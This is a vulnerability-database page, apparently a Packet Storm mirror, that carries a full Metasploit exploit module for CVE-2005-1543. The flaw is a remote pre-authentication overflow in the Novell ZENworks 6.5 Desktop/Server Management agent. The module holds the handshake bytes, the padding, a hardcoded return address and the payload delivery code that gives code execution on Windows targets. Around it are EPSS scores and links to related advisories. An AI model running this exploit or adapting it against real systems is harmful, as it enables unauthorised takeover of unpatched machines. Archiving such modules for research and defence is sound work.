Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAnonymousPACKETSTORM:83038
HistoryNov 26, 2009 - 12:00 a.m.

Novell ZENworks 6.5 Desktop/Server Management Overflow

2009-11-2600:00:00
anonymous
packetstormsecurity.com
36

EPSS

0.958

Percentile

99.5%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',  
'Description' => %q{  
This module exploits a heap overflow in the Novell ZENworks  
Desktop Management agent. This vulnerability was discovered  
by Alex Wheeler.  
  
},  
'Author' => [ 'anonymous' ],  
'License' => BSD_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2005-1543'],  
[ 'OSVDB', '16698'],  
[ 'BID', '13678'],  
  
],  
'Privileged' => true,  
'Payload' =>  
{  
'Space' => 32767,  
'BadChars' => "\x00",  
'StackAdjustment' => -3500,  
},  
'Targets' =>   
[  
[  
'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',  
{  
'Platform' => 'win',  
'Ret' => 0x10002e06,  
},  
],  
],  
'DisclosureDate' => 'May 19 2005',  
'DefaultTarget' => 0))  
end  
  
def exploit  
connect  
  
hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"  
print_status("Sending version identification")  
sock.put(hello)  
  
pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars)  
ident = sock.get_once  
if !(ident and ident.length == 16)  
print_status("Failed to receive agent version identification")  
return  
end  
  
print_status("Received agent version identification")  
print_status("Sending client acknowledgement")  
sock.put("\x00\x01")  
  
# Stack overflow in ZenRem32.exe / ZENworks Server Management  
sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")  
  
ack = sock.get_once  
sock.put("\x00\x01")  
sock.put("\x00\x02")  
  
print_status("Sending final payload")  
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))  
  
print_status("Overflow request sent, sleeping for four seconds")  
sleep(4)  
  
handler  
disconnect  
end  
  
end  
`

Related

saint 4
nvd 1
exploitdb 2
checkpoint_advisories 1
cve 1
nessus 1
metasploit 1
cvelist 1
saint
saint
Novell ZENworks Remote Management authentication buffer overflow
2006-03-02 00:00:00
Novell ZENworks Remote Management authentication buffer overflow
2006-03-02 00:00:00
Novell ZENworks Remote Management authentication buffer overflow
2006-03-02 00:00:00
nvd
nvd
CVE-2005-1543
2005-05-25 04:00:00
exploitdb
exploitdb
Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)
2005-08-12 00:00:00
Novell ZENworks 6.5 - Desktop/Server Management Overflow (Metasploit)
2010-07-25 00:00:00
checkpoint_advisories
checkpoint_advisories
Novell ZENworks Remote Management Buffer Overflow (CVE-2005-1543)
2009-10-25 00:00:00
cve
cve
CVE-2005-1543
2005-05-25 04:00:00
nessus
nessus
Novell ZENworks Multiple Remote Pre-Authentication Overflows
2005-06-17 00:00:00
metasploit
metasploit
Novell ZENworks 6.5 Desktop/Server Management Overflow
2006-01-21 22:10:20
cvelist
cvelist
CVE-2005-1543
2005-05-25 04:00:00

EPSS

0.958

Percentile

99.5%

JSON
Related for PACKETSTORM:83038
saint4nvd1exploitdb2checkpoint_advisories1cve1nessus1metasploit1cvelist1